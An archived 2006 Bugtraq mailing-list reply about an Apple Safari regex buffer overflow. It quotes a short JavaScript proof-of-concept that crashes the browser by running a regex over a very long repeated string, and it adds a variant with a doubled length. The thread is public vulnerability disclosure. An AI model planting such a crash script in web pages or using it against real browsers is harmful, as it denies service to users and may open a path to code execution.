lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Message-ID: <455A2029.5050409@infiltrated.net>
Date: Tue, 14 Nov 2006 14:59:37 -0500
From: "J. Oquendo" <sil@...iltrated.net>
To: jbh_cg@...oo.fr
Cc: bugtraq@...urityfocus.com
Subject: Re: Apple Safari "match" Buffer Overflow Vulnerability

jbh_cg@...oo.fr wrote:
> The following bug was tested on the latest version of Safari on a fully-patched Mac OS X 10.4. 
>
> A remote attacker may exploit this issue to crash the application, effectively denying service to legitimate users. Successful exploitation could lead to remote code execution.
>
> <script>
> var reg = /(.)*/;
> var z = 'Z';
> while (z.length <= 8192) z+=z;
> var boum = reg.exec(z);   
> </script>
>   

while (z.length <= 16384) z+=z;


-- 
====================================================
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 

The happiness of society is the end of government.
John Adams


Download attachment "smime.p7s" of type "application/x-pkcs7-signature" (5157 bytes)

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ